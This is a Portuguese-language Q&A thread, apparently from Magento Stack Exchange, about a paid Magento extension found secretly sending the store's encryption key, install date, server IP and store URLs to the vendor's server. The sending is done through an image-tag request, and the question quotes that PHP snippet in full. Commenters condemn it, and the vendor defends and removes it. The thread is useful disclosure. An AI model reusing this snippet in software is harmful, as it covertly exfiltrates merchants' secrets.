Alguma boa razão para um módulo acessar global / crypt / key remotamente?


19

Perdoe minha ignorância, mas a chave de criptografia é usada para descriptografar dados do Magento, certo? Existe alguma boa razão para um módulo acessar isso? Eu me deparei com esse código depois de instalar o Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />


3
ESTA. É. HORRÍVEL. Não há motivo para vazar sua chave de criptografia.
Fabian Blechschmidt

1
Isso é ruim, muito ruim.
Anna Völkl

1
Boa pegada! Isto é extremamente ruim ...
Sander Mangel

1
Obrigado @Sander por nos contar. Foi removido do Connect.
benmarks

1
@benmarks feliz em ouvir isso. Isso é extremamente decepcionante pelas razões óbvias e também porque o aplicativo foi extremamente impressionante e o desenvolvedor foi extremamente útil e rápido no passado.
TylersSN

Respostas:


11

Sim ... há uma boa razão.
Eles querem conhecê-lo e registrá-lo, apenas por precaução. :)

Você deve desinstalar a extensão (provavelmente já o fez). Você nunca deve usar extensões que "telefonam para casa", independentemente dos dados que eles enviam para casa.

Você pode listar a extensão aqui para outras pessoas verem: Código engraçado / inútil / horrível de Magento Extensions


1
"telefonar para casa" infelizmente é feito por muitos módulos. O Amasty e o Aheadworks também o fazem: \
Sander Mangel

4
Este gist.github.com/miguelbalparda/b57a47a010a5995bc44d pode ser usado para verificar global / crypt / key da CLI em todas as pastas do excel app / code / core.
precisa saber é o seguinte

Portanto, eles não são apenas capazes de descriptografar senhas de dados cc (é bom não salvá-los), etc. Mas paguei US $ 300 para que eles tivessem essa capacidade. É isso que deve ser publicado no Funny.
precisa saber é o seguinte

1
@iUseMagentoNow. Isso é engraçado "ooh", não engraçado "ha ha". Você deve pedir seu dinheiro de volta.
Marius

8

Recebemos a solicitação de suporte sobre esse recurso hoje. Já o resolvemos e removemos esse trecho de código. Uma nova versão está disponível para todos os nossos clientes em sua área de clientes (gratuitamente, pois oferecemos atualização ilimitada).

Eu sei que precisamos justificar isso, então vamos fazer isso:

  • O objetivo deste rastreador era SOMENTE seguir o uso não autorizado de nossa extensão.
  • O rastreador foi exibido apenas na área de administração (nenhum de seus clientes ou ninguém além de você e nós foi capaz de vê-lo).
  • Também removemos isso em nosso banco de dados.
  • A chave é apenas para criptografar sua senha de administrador. Como costumamos trabalhar com todos vocês através de solicitações de suporte, você já pode ter enviado suas credenciais para nós por e-mail, para suporte. Se quiséssemos sua senha, nós a enviaríamos diretamente ... Não era esse o objetivo.
  • Mesmo com a chave, sua senha ainda está criptografada. E o magento admin bloqueia o usuário após algumas tentativas.

Reconhecemos que é um erro, e essa é a força da comunidade e do sistema de código aberto: podemos corrigir e melhorar muito mais rapidamente. Obrigado a todos por terem nos alertado, faremos mais esforços na vulnerabilidade agora.


3
+1 por se esforçar para responder aqui em público no Magento SE!
7ochem 06/0315

2
Uso não autorizado da extensão ?! Você pode simplesmente usar o domínio para isso.
mbalparda
Ao utilizar nosso site, você reconhece que leu e compreendeu nossa Política de Cookies e nossa Política de Privacidade.
Licensed under cc by-sa 3.0 with attribution required.